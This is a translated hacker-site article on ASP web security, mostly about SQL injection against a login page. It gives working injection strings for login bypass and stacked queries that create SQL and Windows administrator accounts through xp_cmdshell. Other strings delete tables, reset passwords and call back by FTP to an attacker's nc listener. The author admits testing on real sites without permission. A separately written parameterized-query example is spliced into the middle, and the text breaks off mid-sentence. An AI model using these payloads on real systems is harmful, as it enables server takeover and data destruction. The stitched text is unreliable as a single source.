[ASP Development] [Intrusion Detection] On SQL Injection Attacks and Prevention

xiaoxiao, 2021-03-06

(http://www.cnhacker.cn/asp/list.asp?id=2184)

I have never studied ASP or PHP programming systematically, nor Access, SQL Server, MySQL or any other database, so I am not a programmer, although I often do the things programmers do. Because I wanted to build my own site I wrote it three times over, a few thousand lines in all, and together with some tests of forums, message boards and article systems I found some problems, which I discuss here. While writing this article I ran some tests against the XX security website, the XX municipal talent network and the website of the XX network company; my apologies! I chose to start testing at 2:00 am and limited myself to search operations, so I can say with certainty that there was almost no impact on your sites, at most an hour of slightly higher traffic. I will send you a security report; I hope you won't mind, huh, huh!

1, .bak files leak ASP source code

Many editing tools, such as EditPlus and UltraEdit, automatically back up a file to a .bak file when saving it, by default. If you create or edit config.asp, the editor automatically generates config.asp.bak. If that file is not deleted, an attacker can download the ASP source by requesting http://www.***.com/config.asp.bak. You can imagine that once your source program has been downloaded the risk of being attacked is undoubtedly much higher, and if it is a configuration file, huh, user name, password, database name and location ... Solution: either turn off the editor's automatic backup function, or delete all .bak files before you upload.

2, Authentication is bypassed

A typical website has many pages that may only be reached after authentication, and each of these pages needs to verify again, but many programmers ignore this. If an attacker knows the path and file name of such a page, they can bypass authentication and open the page directly. For example: you are supposed to log in on login.asp and pass authentication before manage.asp opens, but an attacker can enter the management interface directly through http://www.**.com/manage.asp. Workaround: check at the beginning of each of these pages. For example, after authentication set Session("login") = "ok", and add the following to the program code at the top of every protected page:

    If Session("login") <> "ok" Then
        Response.Redirect "login.asp"
    End If

The two points above are basic programming issues; the focus of this article is SQL injection attacks and their prevention.

3, ASP program database password verification vulnerability

First, about the Request object. We know that if a form uses the GET method you should use the QueryString collection to retrieve the form data, and if it passes data with the POST method you should use the Form collection. Many programmers omit the collection name and use Request("data") directly; it looks simple, but it is actually inefficient and error-prone.

The ASP default search order of the collections is QueryString, Form, Cookies, ServerVariables; when the first matching variable is found it is taken as the member you want to access. So it is recommended that you don't use this method. Having said that, let's turn to the topic. First look at the login.asp file; the following is the program code: ...

    Username  Password ...

Then look at the verify.asp file; the following is the program code:

    ...
    Dim rs, sql
    Dim name, pwd
    name = Request.Form("name")
    pwd = Request.Form("pwd")
    If name = "" Or pwd = "" Then
        Response.Redirect "login.asp"
    End If
    ...
    ' authentication
    sql = "select * from user where name='" & name & "' and pwd='" & pwd & "'"
    ...

Don't think nobody writes it this way; I have seen a lot of it, believe me :). Look at what an attacker can do:

(1) We enter [admin' or 1='1] in the username field and [11] in the password field. Note: the input is only what is between the []. See what the SQL becomes; the following is the program code:

    sql = select * from user where name='admin' or 1='1' and pwd='11'

We know that OR is a logical operator: when several conditions are judged, as long as one of them holds the expression returns true, and the rest are no longer judged. That is, we have bypassed the password check; as long as we know the username we can log into the system.

(2) We can also enter [admin'--] in the username field and [11] in the password field. Look at the SQL; the following is the program code:

    sql = select * from user where name='admin'--' and pwd='11'

Likewise, through the comment marker -- the password check that follows is commented out. This does not work against an Access database.
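Here is a hardened verify.asp, added here as an example (it is not the article's code): the user's input is bound as ADO parameters instead of being spliced into the SQL string, so a value such as admin' or 1='1 is compared as a literal name rather than parsed as SQL; it reads only Request.Form, enforces the length limit on the server because a form's MaxLength (see Method 1 below) is under the client's control, and sets the Session("login") flag that the point 2 check relies on. The connection string name Application("ConnString"), the table user with columns name and pwd, the length limit of 50 and the page names are assumptions.

```vbscript
<%
Option Explicit
' Hardened verify.asp (added example, not the article's code).
' Read only the Form collection: Request("name") would also accept a
' value smuggled in through the query string or a cookie.
Dim name, pwd, conn, cmd, rs
name = Request.Form("name")
pwd  = Request.Form("pwd")

' Client-side MaxLength can be removed from a saved copy of the form,
' so the limit has to be enforced here on the server as well (50 is assumed).
If name = "" Or pwd = "" Or Len(name) > 50 Or Len(pwd) > 50 Then
    Response.Redirect "login.asp"
End If

Set conn = Server.CreateObject("ADODB.Connection")
' Assumed: connection string kept in Application state (set in global.asa),
' using a low-privilege database login rather than sa.
conn.Open Application("ConnString")

' The user's text is bound as parameters: admin' or 1='1 is looked up as
' a name that literally contains those characters, never parsed as SQL.
Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = 1          ' adCmdText
cmd.CommandText = "SELECT name FROM [user] WHERE name = ? AND pwd = ?"
' CreateParameter(name, type, direction, size, value): 200 = adVarChar, 1 = adParamInput
cmd.Parameters.Append cmd.CreateParameter("name", 200, 1, 50, name)
cmd.Parameters.Append cmd.CreateParameter("pwd", 200, 1, 50, pwd)
Set rs = cmd.Execute

If rs.EOF Then
    ' No match: one generic failure, whichever field was wrong
    rs.Close
    conn.Close
    Response.Redirect "login.asp"
Else
    ' Success: set the flag that every protected page checks at its top
    Session("login") = "ok"
    rs.Close
    conn.Close
    Response.Redirect "manage.asp"
End If
%>
```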

(3) If the check that follows can be removed with a comment, then it gets even more interesting. See what we can do:

A. Enter [admin'; exec master.dbo.sp_addlogin cool; --] in the username field: this adds a SQL login.
B. Enter [admin'; exec master.dbo.sp_password null, 123456, cool; --] in the username field: this sets cool's password to 123456.
C. Enter [admin'; exec master.dbo.sp_addsrvrolemember cool, sysadmin; --] in the username field: this gives cool system administrator privileges.
D. Enter [admin'; exec master.dbo.xp_cmdshell 'net user cool 123456 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add'; --] in the username field: this adds a system account cool with password 123456 and sets the related properties; for the net user command, refer here.
E. Enter [admin'; exec master.dbo.xp_cmdshell 'net localgroup administrators cool /add'; --] in the username field: this adds cool to the administrators group.

Feeling scared now? Of course, I am not finished yet. Doing all this requires the site to connect to the database with sa or system administrator privileges; ordinary virtual hosting won't, unless the administrator is a fool. But for sites on their own server it is really hard to say, huh, huh, I have seen N of them. And if it is not sa, can we do nothing? Of course not! We just cannot get high enough privileges to control the SQL server and the system, but we still have full administrative authority over this database. See what we can do:

a. Enter [admin'; delete user; --]: once his table name is user, this deletes all records in the user table. Enough! Don't do this!
b. Enter [admin'; insert into user (name, pwd) values ('cool', '123456'); --]: this adds a user to the user table; of course, the premise is that the table name and field names are correct.
c. Enter [admin'; update news set pwd='123456' where name='admin'; --]: this changes admin's password; again, the premise is that the table name and field names are correct.

For more attacks, refer to the SQL syntax. So it seems that if it is not sa we are stuck. Of course, we also have a simple way to determine whether a website uses sa to connect to the database:

a. Run nc -l -p 21 in cmd to listen on port 21 of your own machine; of course, a firewall can be used too.

b. Enter [admin'; exec master.dbo.xp_cmdshell 'ftp *.*.*.*'] in the username field, where *.*.*.* is your IP address. If you see a connection arrive, you can conclude that the site uses sa, and you also get the IP address of the site's database server, because some websites put the web and SQL servers on different machines; if no connection arrives, the site uses a non-sa account. Some friends may already have seen it: if the website uses sa, we can initiate a connection from inside the page, construct an FTP script, or use TFTP to upload files, even if there is a firewall.

Maybe some friends will say that the form has a maximum length, so you can't enter that much! Never mind, it is not hard to get around.

Method 1:

a. Open the site page http://www.***.com/login.asp, view the source, copy the form submission part (the program code: Username Password ...) and save it as login.htm.
b. Change the action to http://www.***.com/verify.asp; that is, the following is the program code: Username Password ... Note: some websites leave the action empty here, and you need to look slowly for where it submits to, huh, I have encountered this situation; generally it can be found.

c. Modify MaxLength: increase it, or simply delete it!
d. Submit the variables from your local machine. cool.reg for 9x users; the following is the program code:

    REGEDIT4
    [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\increase]
    @="c:\\cool.htm"
    "Contexts"=dword:00000004

For 2K users, the following is the program code:

    Windows Registry Editor Version 5.00
    [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\increase]
    @="c:\\cool.htm"
    "Contexts"=dword:00000004

The code for cool.htm is as follows: